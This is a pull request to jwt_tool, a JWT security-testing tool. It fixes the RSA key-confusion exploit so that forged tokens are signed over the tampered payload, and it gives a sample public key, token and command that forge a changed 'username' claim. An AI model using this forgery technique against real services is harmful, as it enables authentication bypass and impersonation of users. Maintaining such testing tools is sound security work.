### PR TITLE
Data not updated when Confussion Attack was triggered

### DIFF
--- a/jwt_tool.py
+++ b/jwt_tool.py
@@ -1,13 +1,13 @@
 #!/usr/bin/env python3
 #
-# JWT_Tool version 2.1.0 (10_11_2020)
+# JWT_Tool version 2.1.1 (17_12_2020)
 # Written by Andy Tyler (@ticarpi)
 # Please use responsibly...
 # Software URL: https://github.com/ticarpi/jwt_tool
 # Web: https://www.ticarpi.com
 # Twitter: @ticarpi
 
-jwttoolvers = "2.1.0"
+jwttoolvers = "2.1.1"
 import ssl
 import sys
 import os
@@ -1704,6 +1704,7 @@ def runExploits():
             # exit(1)
         elif args.exploit == "k":
             if config['crypto']['pubkey']:
+                paylB64 = base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")
                 newTok, newSig = checkPubKeyExploit(headDict, paylB64, config['crypto']['pubkey'])
                 desc = "EXPLOIT: Key-Confusion attack (signing using the Public Key as the HMAC secret)\n(This will only be valid on unpatched implementations of JWT.)"
                 jwtOut(newTok+"."+newSig, "RSA Key Confusion Exploit", desc)


### PR DESCRIPTION
When performing a Confusion Attack, data needs to be updated after the Tampered action was triggered. Otherwise the attack will sign the original data instead of the tampered one.

Example to test:

```
$ cat ../public.key 
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA95oTm9DNzcHr8gLhjZaY
ktsbj1KxxUOozw0trP93BgIpXv6WipQRB5lqofPlU6FB99Jc5QZ0459t73ggVDQi
XuCMI2hoUfJ1VmjNeWCrSrDUhokIFZEuCumehwwtUNuEv0ezC54ZTdEC5YSTAOzg
jIWalsHj/ga5ZEDx3Ext0Mh5AEwbAD73+qXS/uCvhfajgpzHGd9OgNQU60LMf2mH
+FynNsjNNwo5nRe7tR12Wb2YOCxw2vdamO1n1kf/SMypSKKvOgj5y0LGiU3jeXMx
V8WS+YiYCU5OBAmTcz2w2kzBhZFlH6RK4mquexJHra23IGv5UJ5GVPEXpdCqK3Tr
0wIDAQAB
-----END PUBLIC KEY-----

$ token='eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QxIiwicGsiOiItLS0tLUJFR0lOIFBVQkxJQyBLRVktLS0tLVxuTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUE5NW9UbTlETnpjSHI4Z0xoalphWVxua3RzYmoxS3h4VU9vencwdHJQOTNCZ0lwWHY2V2lwUVJCNWxxb2ZQbFU2RkI5OUpjNVFaMDQ1OXQ3M2dnVkRRaVxuWHVDTUkyaG9VZkoxVm1qTmVXQ3JTckRVaG9rSUZaRXVDdW1laHd3dFVOdUV2MGV6QzU0WlRkRUM1WVNUQU96Z1xuaklXYWxzSGovZ2E1WkVEeDNFeHQwTWg1QUV3YkFENzMrcVhTL3VDdmhmYWpncHpIR2Q5T2dOUVU2MExNZjJtSFxuK0Z5bk5zak5Od281blJlN3RSMTJXYjJZT0N4dzJ2ZGFtTzFuMWtmL1NNeXBTS0t2T2dqNXkwTEdpVTNqZVhNeFxuVjhXUytZaVlDVTVPQkFtVGN6Mncya3pCaFpGbEg2Uks0bXF1ZXhKSHJhMjNJR3Y1VUo1R1ZQRVhwZENxSzNUclxuMHdJREFRQUJcbi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLVxuIiwiaWF0IjoxNjA4MTcxNTUxfQ.4q79TYmMwymcwMVXKqzaLyL9njkrhLScBODm1GnkVoRKL6OcM8X5x7-1gfzvPKgHyuzlXGcj78oVKHaWFXQ1tqCiKUSW7R3kew0T3eXCRZnh1zq0zLfiu8N1PLu5DNf44NPxvWRXEGuzdRJofCAqQzxo6vWdkcV1BhFLisylRtypO2dntNmxFOdznO2fw65gW4ILiJ27g3wMezjWZh14_333iiZI-gD-utiKYHZTKLMO-NlZbFPcrkwe_sCmSVmFb33vuDeMyuQqLx60FW0DXX0HsrH5bzXX1RVP0Uk-GUqRAbOHeKEEWUmOcgxBTRBDQInVpXRCsghE4dhkXP8ydA'
$ ./jwt_tool.py -T -X k -pk ../public.key -pc 'username' -I -pv 'test4' $token
<Press 0 (continue) twice>
```